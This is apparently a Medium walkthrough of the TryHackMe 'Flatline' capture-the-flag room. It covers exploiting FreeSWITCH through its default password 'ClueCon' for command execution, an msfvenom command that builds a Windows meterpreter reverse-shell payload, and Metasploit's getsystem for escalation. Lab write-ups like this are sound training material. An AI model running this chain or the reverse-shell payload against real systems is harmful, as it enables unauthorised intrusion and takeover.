Flatline THM Walkthrough

My tryhackme profile : https://tryhackme.com/p/technoreck

Reconnaissance

Starting with Scanning the machine to find what all ports are open and what service they are running.

nmap -sC -sV -vv -Pn <Target Machine>

Here on Port 8021, we found something interesting, a service named Free SWITCH. Lets see if we can get some exploitation for it on ExploitDB.

Got one Exploit of Command Execution, lets Download it.

Lets try to understand what actually the exploit it doing. So, from the above code we can infer that Free-switch is a kind of gateway with a default password “ClueCon” which allows you to execute any arbitrary command of the host. Lets test it!

Remote Command Execution

noicee! The command worked and we got the name of the User, nekrotic.

Lets Now read the user flag directly using the type command on the user.txt file in the desktop of the user nekrotic.

User Flag

I tried the same with root.txt but it threw an error -ERR no reply.

Now to do the further process and to get the root flag we need a reverse shell for exploiting it. So, we will use msfvenom to make a windows reverse shell payload. Here is the command:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f exe > rootkit.exe

Reverse Shell and Root Flag

Now, by starting a http server on our local machine, we will upload upload this rootkit.exe on the host using Command Execution and also start our listener using Metasploit to receive the Connection from the host after the exploit is executed. This process may take some minutes as the machine is slow.

Boom!, here we are in the host’s system.

Now if you try to run the command “net user”, you’ll get to know that the user nekrotic has administrator privileges but then also we are not able to read the root.txt file, why?

So, most probably the permission of accessing the root.txt file has changed to only system and can only be accessed if you are accessing it as a system default account. Let me better explain you this with an image:

See in the image, here though I am the administrator, If I remove the read permission from my privilege for this particular text file, then the SYSTEM is the only one which can access it, but since I am an admin, I can invoke the system call and tell that I am accessing everything as a SYSTEM. So how can I do that, we can do this with this command:

getsystem

now lets try to read the root.txt file

Voillaa!!! We got the root flag and completed the Challenge.

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store